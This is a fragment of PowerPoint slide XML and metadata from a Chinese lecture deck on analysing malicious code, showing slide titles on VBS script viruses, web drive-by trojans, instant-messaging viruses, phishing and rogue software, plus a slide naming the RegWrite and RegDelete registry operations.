                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="-윤고딕120"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="-윤고딕120"/>
              </a:rPr>
              <a:t>修改注册表键值的操作</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="-윤고딕120"/>
              </a:rPr>
              <a:t>RegWrite </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="-윤고딕120"/>
              </a:rPr>
              <a:t>删除注册表键值的操作</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="-윤고딕120"/>
              </a:rPr>
              <a:t>RegDelete</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
              <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              <a:cs typeface="-윤고딕12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807</TotalTime>
  <Words>3766</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>自定义</PresentationFormat>
  <Paragraphs>479</Paragraphs>
  <Slides>61</Slides>
  <Notes>10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穿越</vt:lpstr>
      <vt:lpstr>计算机病毒防治技术（其它恶意代码分析）</vt:lpstr>
      <vt:lpstr>第5章 其它恶意代码分析</vt:lpstr>
      <vt:lpstr>脚本病毒的基本原理及其防治</vt:lpstr>
      <vt:lpstr>脚本病毒的基本原理及其防治</vt:lpstr>
      <vt:lpstr>脚本病毒的基本原理及其防治</vt:lpstr>
      <vt:lpstr>脚本病毒的基本原理及其防治</vt:lpstr>
      <vt:lpstr>访问文件系统</vt:lpstr>
      <vt:lpstr>创建文件</vt:lpstr>
      <vt:lpstr>访问注册表</vt:lpstr>
      <vt:lpstr>访问注册表（续）</vt:lpstr>
      <vt:lpstr>脚本病毒的基本原理及其防治</vt:lpstr>
      <vt:lpstr>VBS脚本病毒如何感染复制</vt:lpstr>
      <vt:lpstr>脚本病毒的基本原理及其防治</vt:lpstr>
      <vt:lpstr>通过局域网共享传播</vt:lpstr>
      <vt:lpstr>文件搜索代码</vt:lpstr>
      <vt:lpstr>VBS脚本病毒通过网络传播的几种方式及代码分析</vt:lpstr>
      <vt:lpstr>VBS脚本病毒通过网络传播的几种方式及代码分析（续）</vt:lpstr>
      <vt:lpstr>VBS脚本病毒通过网络传播的几种方式及代码分析（续）</vt:lpstr>
      <vt:lpstr>通过感染htm等网页文件传播</vt:lpstr>
      <vt:lpstr>通过感染htm等网页文件传播</vt:lpstr>
      <vt:lpstr>通过感染htm等网页文件传播</vt:lpstr>
      <vt:lpstr>通过IRC聊天通道传播</vt:lpstr>
      <vt:lpstr>脚本病毒的基本原理及其防治</vt:lpstr>
      <vt:lpstr>脚本病毒的基本原理及其防治</vt:lpstr>
      <vt:lpstr>脚本病毒的基本原理及其防治</vt:lpstr>
      <vt:lpstr>脚本病毒的基本原理及其防治</vt:lpstr>
      <vt:lpstr>脚本病毒的基本原理及其防治</vt:lpstr>
      <vt:lpstr>脚本病毒的基本原理及其防治</vt:lpstr>
      <vt:lpstr>脚本病毒的基本原理及其防治</vt:lpstr>
      <vt:lpstr>网页挂马</vt:lpstr>
      <vt:lpstr>网页挂马</vt:lpstr>
      <vt:lpstr>网页挂马</vt:lpstr>
      <vt:lpstr>网页挂马</vt:lpstr>
      <vt:lpstr>网页挂马</vt:lpstr>
      <vt:lpstr>网页挂马</vt:lpstr>
      <vt:lpstr>网页挂马</vt:lpstr>
      <vt:lpstr>网页挂马</vt:lpstr>
      <vt:lpstr>即时通讯病毒</vt:lpstr>
      <vt:lpstr>即时通讯病毒</vt:lpstr>
      <vt:lpstr>即时通讯病毒</vt:lpstr>
      <vt:lpstr>即时通讯病毒</vt:lpstr>
      <vt:lpstr>即时通讯病毒</vt:lpstr>
      <vt:lpstr>即时通讯病毒</vt:lpstr>
      <vt:lpstr>即时通讯病毒</vt:lpstr>
      <vt:lpstr>即时通讯病毒</vt:lpstr>
      <vt:lpstr>网络钓鱼</vt:lpstr>
      <vt:lpstr>网络钓鱼</vt:lpstr>
      <vt:lpstr>网络钓鱼</vt:lpstr>
      <vt:lpstr>网络钓鱼</vt:lpstr>
      <vt:lpstr>网络钓鱼</vt:lpstr>
      <vt:lpstr>网络钓鱼</vt:lpstr>
      <vt:lpstr>防范网络钓鱼的安全建议</vt:lpstr>
      <vt:lpstr>防范网络钓鱼的安全建议</vt:lpstr>
      <vt:lpstr>防范网络钓鱼的安全建议</vt:lpstr>
      <vt:lpstr>流氓软件</vt:lpstr>
      <vt:lpstr>流氓软件</vt:lpstr>
      <vt:lpstr>流氓软件</vt:lpstr>
      <vt:lpstr>流氓软件</vt:lpstr>
      <vt:lpstr>流氓软件原理</vt:lpstr>
      <vt:lpstr>流氓软件</vt:lpstr>
      <vt:lpstr>流氓软件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计算机病毒防治技术 （其它恶意代码分析）</dc:title>
  <dc:creator>apple</dc:creator>
  <cp:lastModifiedBy>apple</cp:lastModifiedBy>
  <cp:revision>11</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2015-05-05T08:02:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-10-21T14:55:53Z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